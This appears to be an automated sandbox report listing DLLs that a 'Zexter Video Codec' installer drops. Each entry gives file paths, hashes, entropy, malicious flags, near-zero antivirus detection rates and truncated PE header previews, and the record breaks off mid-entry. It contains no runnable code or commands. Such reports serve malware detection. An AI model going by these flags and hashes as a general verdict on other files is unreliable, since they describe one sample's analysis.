                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........g......#...............................c................................6......... .........................Y@......................................0....................................................................................text...D...........................`.P`.data...............................@.`..rdata..0".......$..................@.`@/4.......Z.......\..................@.0@.bss....t....p........................`..edata..Y@.......B...8..............@.0@.idata...............z..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..0...........................@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-9G1LK.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1545467
                                                                                                    Entropy (8bit):6.529166035051036
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:f//9GOTyiDI4jm0B4/W1EkWLENaQemY0y6hW98cA4q0v4gf:bVYKW983e
                                                                                                    MD5:7F95672216191C57573D049090125ECE
                                                                                                    SHA1:2C9D065A1F28F511149C3DBA219B52004FC51262
                                                                                                    SHA-256:689991853CD09032089F52656C9508061F105FAB5727F250890563EBF2656A45
                                                                                                    SHA-512:FD0DD095D5D76400FA97F5B3231D16570284EC31D04E2E9F3278F378233F316D4D91715898BF8A1B81803E613B97B2FE5FB064A9BD6BAE6E08AD3CAB9613E61B
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........~.........#.....4...z...............P.....o.......................................... ..........................p...0...............................p...t...........................`.......................2..D............................text....2.......4..................`.P`.data........P... ...8..............@.`..rdata..@....p.......X..............@.`@/4.......M...P...N...2..............@.0@.bss..................................`..edata...p.......r..................@.0@.idata.......0......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..reloc...t...p...v..................@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-BA0AN.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):268404
                                                                                                    Entropy (8bit):6.265024248848175
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:yL8lD0bVAYhILCN0z+tUbO01CDXQ6yw+RseNYWFZvc/NNap:1Uy+tUbO01CDXQ6ywcYWFZvCNNap
                                                                                                    MD5:C4C23388109D8A9CC2B87D984A1F09B8
                                                                                                    SHA1:74C9D9F5588AFE721D2A231F27B5415B4DEF8BA6
                                                                                                    SHA-256:11074A6FB8F9F137401025544121F4C3FB69AC46CC412469CA377D681D454DB3
                                                                                                    SHA-512:060F175A87FBDF3824BEED321D59A4E14BE131C80B7C41AFF260291E69A054F0671CC67E2DDA3BE8A4D953C489BC8CDE561332AA0F3D82EF68D97AFCF115F6A3
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....V...................p....4j.......................................... ......................`.......`..xk..............................D....................................................k...............................text....T.......V..................`.P`.data... ....p.......Z..............@.0..rdata..X ......."...\..............@.`@/4......0............~..............@.0@.bss....H....P........................`..edata.......`......................@.0@.idata..xk...`...l..................@.0..CRT....,............x..............@.0..tls.... ............z..............@.0..reloc..D............|..............@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-D169I.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):509934
                                                                                                    Entropy (8bit):6.031080686301204
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:wx/Eqtn5oeHkJstujMWYVgUr/MSK/zwazshLKl11PC5qLJy1Pkfsm:M/NDXEJIPVgUrgbzslW11UqLJokfsm
                                                                                                    MD5:02E6C6AB886700E6F184EEE43157C066
                                                                                                    SHA1:E796B7F7762BE9B90948EB80D0138C4598700ED9
                                                                                                    SHA-256:EA53A198AA646BED0B39B40B415602F8C6DC324C23E1B9FBDCF7B416C2C2947D
                                                                                                    SHA-512:E72BC0A2E9C20265F1471C30A055617CA34DA304D7932E846D5D6999A8EBCC0C3691FC022733EAEB74A25C3A6D3F347D3335B902F170220CFE1DE0340942B596
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........P......#...............................k......................... ......CY........ .....................................................................................................................|...,............................text...T...........................`.P`.data...............................@.0..rdata..XN.......P..................@.`@/4.......x...0...z..................@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-FGQU3.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1400653
                                                                                                    Entropy (8bit):6.518664771362139
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:YiyJaaUAnPfI1FO1Fm5wukMdBdfrwQAZV2R6yeYH3bhlN77S+N+RoQ8J0fnuVj1z:4aaUAnI1FOFmZkM1i2n5h++N+RCJ0fA1
                                                                                                    MD5:1124DD59526216DF405C4514949CCB54
                                                                                                    SHA1:8226C42D98B9D3C0E83A11167963D5B38B6DDD45
                                                                                                    SHA-256:A9016D40755966C547464430D3509CC3CFE9DD5D8B53F8B694B42B0D7141E5D6
                                                                                                    SHA-512:F007FBD3FBA7E3966FAF5F9D857ADB6607A99CD6FD8FFDF14E858BE6C4A0B155A9197BAA9D1DF0A28AF733F78F8A7346357EBAA7D3BD0C3934BF815CC51A930D
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........F.........#.........B... .................q.................................y........ ...................... .......................................0..t............................ ......................8................................text...............................`.P`.data...............................@.`..rdata..Tn... ...p..................@.`@/4.......c.......d...x..............@.0@.bss..................................`..edata....... ......................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..reloc..t....0......................@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-FLD95.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):291245
                                                                                                    Entropy (8bit):6.234245376773595
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:dg6RpdbWJbnZ9zwvNOmdcm0sn+g2eqZq6eadTD8:UJ99zwvNOmdcm0s+g1qZQadTD8
                                                                                                    MD5:2D8A0BC588118AA2A63EED7BF6DFC8C5
                                                                                                    SHA1:7FB318DC21768CD62C0614D7AD773CCFB7D6C893
                                                                                                    SHA-256:707DEE17E943D474FBE24EF5843A9A37E923E149716CAD0E2693A0CC8466F76E
                                                                                                    SHA-512:A296A8629B1755D349C05687E1B9FAE7ED5DE14F2B05733A7179307706EA6E83F9F9A8729D2B028EDDC7CAF8C8C30D69AD4FEA6EC19C66C945772E7A34F100DE
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........h..@......#.........d....................4i................................<......... ......................p..5.......t...................................................................................<................................text...T...........................`.P`.data...0...........................@.0..rdata...v.......x..................@.`@/4...........@......................@.0@.bss.........`........................`..edata..5....p.......6..............@.0@.idata..t............>..............@.0..CRT....,............F..............@.0..tls.... ............H..............@.0..reloc...............J..............@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-G59D3.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):30994
                                                                                                    Entropy (8bit):5.666281517516177
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:SrCNSOFBZVDIxxDsIpx0uZjaYNdJSH6J6:SrCyx0maYNdh6
                                                                                                    MD5:3C033F35FE26BC711C4D68EB7CF0066D
                                                                                                    SHA1:83F1AED76E6F847F6831A1A1C00FEDC50F909B81
                                                                                                    SHA-256:9BA147D15C8D72A99BC639AE173CFF2D22574177242A7E6FE2E9BB09CC3D5982
                                                                                                    SHA-512:7811BE5CCBC27234CE70AB4D6541556612C45FE81D5069BA64448E78953387B1C023AA2A04E5DBF8CAACE7291B8B020BEE2F794FBC190837F213B8D6CB698860
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........p..8......#.....*...l...............@.....j.......................................... .........................a.......(...............................x...................................................,................................text...8(.......*..................`.P`.data... ....@......................@.0..rdata.......P.......0..............@.0@/4...........`.......6..............@.0@.bss..................................`..edata..a............L..............@.0@.idata..(............`..............@.0..CRT....,............h..............@.0..tls.... ............j..............@.0..reloc..x............l..............@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-H2J0H.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):140752
                                                                                                    Entropy (8bit):6.52778891175594
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:Uw0ucwd0gZ36KErK+i+35KwO/hVQN6ulXazERIdF+aP2je8g5og96:ZlcWpErK+i9zEQF+aPKZo6
                                                                                                    MD5:A8F646EB087F06F5AEBC2539EB14C14D
                                                                                                    SHA1:4B1FBAB6C3022C3790BC0BD0DD2D9F3BA8FF1759
                                                                                                    SHA-256:A446F09626CE7CE63781F5864FDD6064C25D9A867A0A1A07DCECB4D5044B1C2B
                                                                                                    SHA-512:93BB40C5FE93EF97FE3BC82A0A85690C7B434BD0327BB8440D51053005A5E5B855F9FCC1E9C676C43FF50881F860817FF0764C1AD379FC08C4920AA4A42C5DBC
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 2%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........w......#.....T...................p.....a.......................................... ......................0.......@.......p..@.......................T............................`......................8B...............................text....R.......T..................`.P`.data........p.......X..............@.`..rdata...F.......H...\..............@.`@/4......L3.......4..................@.0@.bss....@.............................`..edata.......0......................@.0@.idata.......@......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc...@....p......................@.0..reloc..T...........................@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-I8TQ0.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):441975
                                                                                                    Entropy (8bit):6.372283713065844
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:KOjlUsee63NlC1NiiA0XcQj0S5XTJAmLYWB6EYWOsIEvCmiu:DRGNq0wdAmcWBGsIEviu
                                                                                                    MD5:6CD78C8ADD1CFC7CBB85E2B971FCC764
                                                                                                    SHA1:5BA22C943F0337D2A408B7E2569E7BF53FF51CC5
                                                                                                    SHA-256:C75587D54630B84DD1CA37514A77D9D03FCE622AEA89B6818AE8A4164F9F9C73
                                                                                                    SHA-512:EAFDF6E38F63E6C29811D7D05821824BDAAC45F8B681F5522610EEBB87F44E9CA50CE690A6A3AA93306D6A96C751B2210F96C5586E00E323F26F0230C0B85301
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....~.........................a......................... ......A3........ ..........................'......................................|....................................................................................text...4|.......~..................`.P`.data...............................@.`..rdata..............................@.`@/4..................................@.0@.bss..................................`..edata...'.......(...R..............@.0@.idata...............z..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..|...........................@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-ILE5I.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64724
                                                                                                    Entropy (8bit):5.910307743399971
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:U84Oo2LbVtfNsqnYPL7cZ690d+yCG7QiZggD0Spo3YfklbTRPmK0Lz:Uf2LbVtfDGLr2xk4DU3YfkhTRuKW
                                                                                                    MD5:7AF455ADEA234DEA33B2A65B715BF683
                                                                                                    SHA1:F9311CB03DCF50657D160D89C66998B9BB1F40BA
                                                                                                    SHA-256:6850E211D09E850EE2510F6EAB48D16E0458BCE35916B6D2D4EB925670465778
                                                                                                    SHA-512:B8AC3E2766BB02EC37A61218FAF60D1C533C0552B272AF6B41713C17AB69C3731FA28F3B5D73766C5C59794D5A38CC46836FD93255DF38F7A3ABD219D51BB41A
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....h........................lm.........................P................ .................................."...0..`....................@............................... .......................................................text...dg.......h..................`.P`.data...0............l..............@.0..rdata...............n..............@.@@/4......\............z..............@.0@.bss....,.............................`..edata..............................@.0@.idata...".......$..................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..rsrc...`....0......................@.0..reloc.......@......................@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-JTN8Q.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):814068
                                                                                                    Entropy (8bit):6.5113626552096
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:ZEygs0MDl9NALk12XBoO/j+QDr4TARkKtff8WvLCC2:vKMDl9aGO+/TAR5tff8og
                                                                                                    MD5:5B1EB4B36F189362DEF93BF3E37354CC
                                                                                                    SHA1:8C0A4992A6180D0256ABF669DFDEE228F03300BA
                                                                                                    SHA-256:D2D7D9821263F8C126C6D8758FFF0C88F2F86E7E69BFCC28E7EFABC1332EEFD7
                                                                                                    SHA-512:BF57664A96DC16DAD0BB22F6BE6B7DAE0BB2BA2C6932C8F64AEC953E77DC5CDA48E3E05FB98EFE766969832DBC6D7357F8B8D144BD438E366CE746B3B31E2C96
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Wl....i......#..............................Tl.................................`........ ..........................b...`...L.......h...................@...I...................................................j..X............................text..............................`.P`.data...............................@.`..rdata..\...........................@.`@/4.......S...p...T...H..............@.0@.bss..................................`..edata...b.......d..................@.0@.idata...L...`...L..................@.0..CRT....,............L..............@.0..tls.... ............N..............@.0..rsrc....h.......j...P..............@.0..reloc...I...@...J..................@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-MI7QU.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):397808
                                                                                                    Entropy (8bit):6.396146399966879
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:q6WhfTNgMVVPwCxpk76CcIAg8TQfn9l1bBE3A97vupNBXH:q60TvSGpk7eIAg489l1S3A97vkVH
                                                                                                    MD5:E0747D2E573E0A05A7421C5D9B9D63CC
                                                                                                    SHA1:C45FC383F9400F8BBE0CA8E6A7693AA0831C1DA7
                                                                                                    SHA-256:25252B18CE0D80B360A6DE95C8B31E32EFD8034199F65BF01E3612BD94ABC63E
                                                                                                    SHA-512:201EE6B2FD8DCD2CC873726D56FD84132A4D8A7434B581ABD35096A5DE377009EC8BC9FEA2CC223317BBD0D971FB1E61610509E90B76544BDFF069E0D6929AED
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 2%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\4......n......#......................... ....Dk.......................................... ..........................5...0...............................`..T............................P.......................2...............................text...D...........................`.P`.data...X1... ...2..................@.`..rdata..x....`.......F..............@.`@/4..................................@.0@.bss....`.............................`..edata...5.......6..................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.... ....P......................@.0..reloc..T....`......................@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-MJPNF.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):181527
                                                                                                    Entropy (8bit):6.362061002967905
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:jJoxZgqj/2VkWePT1lempKE7PQrXGx6duqPhyxO+jOfMjHyv:jef/2eH72mprIs6VyfOfMY
                                                                                                    MD5:0D0D311D1837705B1EAFBC5A85A695BD
                                                                                                    SHA1:AA7FA3EB181CC5E5B0AA240892156A1646B45184
                                                                                                    SHA-256:AFB9779C4D24D0CE660272533B70D2B56704F8C39F63DAB0592C203D8AE74673
                                                                                                    SHA-512:14BC65823B77E192AACF613B65309D5A555A865AC00D2AB422FD209BD4E6C106ECCE12F868692C3EEA6DCCB3FE4AD6323984AEF60F69DA08888ABCD98D76327D
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..............#..............................Te......................... ................ .........................b........#......................................................................................H............................text...$...........................`.P`.data...4...........................@.0..rdata...J.......L..................@.`@/4.......I... ...J..................@.0@.bss.........p........................`..edata..b............@..............@.0@.idata...#.......$...V..............@.0..CRT....,............z..............@.0..tls.... ............|..............@.0..rsrc................~..............@.0..reloc..............................@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-MMD8V.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1374336
                                                                                                    Entropy (8bit):6.544219940913283
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:XxPyiEuJLPKpBW3n41iniSpKMFH/ZNYTujQb/XseSGwUCowrnDKHYHdT8s5ly8:B5XlHdxV
                                                                                                    MD5:86CE128833ECB1AC52EBED17993C1B56
                                                                                                    SHA1:C7FC8F88E908591CAAA9F25B954B06E814576158
                                                                                                    SHA-256:B22B57B0B6E0FD531CEA32CED338B9D12DD018D09D0B95CD61F166F64253B355
                                                                                                    SHA-512:1B8BEE2668599E33EA6F8121F7584431211512D6BCC8B409EAE162FBD6B505B0F4D0CD984AC8439C515BE4058A20270954D5DCBC62D16E95ED31A8225500F839
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........L......#.....0...................@.....k.................................W........ .........................I....P...................................}...................................................i...............................text..../.......0..................`.P`.data...<....@.......4..............@.@..rdata..,....P.......6..............@.`@/4.......@...@...B...&..............@.0@.bss..................................`..edata..I............h..............@.0@.idata.......P......................@.0..CRT....,....p.......&..............@.0..tls.... ............(..............@.0..reloc...}.......~...*..............@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-MOHPK.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):448557
                                                                                                    Entropy (8bit):6.353356595345232
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:TC5WwqtP7JRSIOKxQg2FgggggggTggZgoggggggggggggggggggnggDggD7d:TC5WltP7JRSIOKxmeR
                                                                                                    MD5:908111F583B7019D2ED3492435E5092D
                                                                                                    SHA1:8177C5E3B4D5CC1C65108E095D07E0389164DA76
                                                                                                    SHA-256:E8E2467121978653F9B6C69D7637D8BE1D0AC6A4028B672A9B937021AD47603C
                                                                                                    SHA-512:FD35BACAD03CFA8CD1C0FFF2DAC117B07F516E1E37C10352ED67E645F96E31AC499350A2F21702EB51BE83C05CF147D0876DAC34376EEDE676F3C7D4E4A329CB
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 2%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....,...................@.....i......................... ......._........ .........................[.......X...............................(&...................................................... ............................text...d*.......,..................`.P`.data........@.......0..............@.`..rdata......P.......2..............@.`@/4..................................@.0@.bss....|.............................`..edata..[............j..............@.0@.idata..X...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..(&.......(..................@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-MVKEA.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):259014
                                                                                                    Entropy (8bit):6.075222655669795
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:O4WGkOMuCsxvlBUlthMP3SyyqX3/yfGG7ca/RM3yH8Tw/yr+Jg8jGCzftns9/1tA:tWGkOME304A7ca/RNyN8jGCzftngvA
                                                                                                    MD5:B4FDE05A19346072C713BE2926AF8961
                                                                                                    SHA1:102562DE2240042B654C464F1F22290676CB6E0F
                                                                                                    SHA-256:513CEC3CCBE4E0B31542C870793CCBDC79725718915DB0129AA39035202B7F97
                                                                                                    SHA-512:9F3AEE3EBF04837CEEF08938795DE0A044BA6602AACB98DA0E038A163119C695D9CC2CA413BD709196BFD3C800112ABABC3AF9E2E9A0C77D88BD4A1C88C2ED27
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#..............................xe.........................@.......{........ .........................+;......L.......0.................... ..8...................................................h................................text...............................`.P`.data...$...........................@.0..rdata.../.......0..................@.`@/4.......l.......n..................@.0@.bss....,.............................`..edata..+;.......<...d..............@.0@.idata..L...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...0...........................@.0..reloc..8.... ......................@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-O9QDL.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):101544
                                                                                                    Entropy (8bit):6.237382830377451
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:nrYjG+7rjCKdiZ4axdj+nrlv3ecaQZ93yQNMRP2Ea5JPTxi0C9A046QET:M9eKdiBxUnfb3yZROEYJPTxib9A5ET
                                                                                                    MD5:E13FCD8FB16E483E4DE47A036687D904
                                                                                                    SHA1:A54F56BA6253D4DECAAE3DE8E8AC7607FD5F0AF4
                                                                                                    SHA-256:0AC1C17271D862899B89B52FAA13FC4848DB88864CAE2BF4DC7FB81C5A9A49BF
                                                                                                    SHA-512:38596C730B090B19E34183182273146C3F164211644EBC0A698A83651B2753F7D9B1D6EE477D1798BD7219B5977804355E2F57B1C3013BF3D498BF96DEC9D02E
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#.........`....................Hk.................................$........ ......................`..-....p......................................................................................Lt...............................text...............................`.P`.data...L...........................@.0..rdata..............................@.`@/4.......*... ...,..................@.0@.bss.........P........................`..edata..-....`.......*..............@.0@.idata.......p... ...0..............@.0..CRT....,............P..............@.0..tls.... ............R..............@.0..rsrc................T..............@.0..reloc...............X..............@.0B........................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-OCNI8.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):693931
                                                                                                    Entropy (8bit):6.506667977069754
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:pgl0XdgCyZfZ1hTDy4ArwyP5Lt6fEWmOxU:u0NnYZ1hTDy44PTZOG
                                                                                                    MD5:37CE2C67DDCEE507833B9AE784AE515D
                                                                                                    SHA1:711B2AAE989D439CC816D198A3A4A7CDD6A070A3
                                                                                                    SHA-256:7A2BD595F34A25C13E94E4C2CDFB1758E9DE60FA7D497F5755BBBF906E82A0D7
                                                                                                    SHA-512:B8FB5A3D2CA99A661FB35F1C560A283070D28A1E438BF124632D4AD8D2EBE0869DF73F1AB8149DEA1FCA66B0285D28028DF83EF36AB27431ED26176EC2A21FCE
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....Z...|...............p.....b.......................................... ......................p../.......(...............................t....................................................................................text....Y.......Z..................`.P`.data...L....p.......^..............@.0..rdata..x............`..............@.`@/4...........0...0..................@.0@.bss.........`........................`..edata../....p.......2..............@.0@.idata..(............J..............@.0..CRT....,............\..............@.0..tls.... ............^..............@.0..reloc..t........ ...`..............@.0B................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\is-OMDJC.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1055417
                                                                                                    Entropy (8bit):7.312780382733874
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:1MWKOBAUZLYRwPKDOlbbT0pGavkg3NyeuQ6l9fHOfc4Z:1dBAUZLYWiDOSpGaXBuQQ9u3Z
                                                                                                    MD5:F721A6B0A1590D55EADEAE81B8F629AA
                                                                                                    SHA1:8C6ED37D1D926D949161FF5F3B5682A4068644CE
                                                                                                    SHA-256:8E2EB9BAC3F5C37D91BFF7F04420DDA55CD369178C73ADF11E6C4DD7E597260F
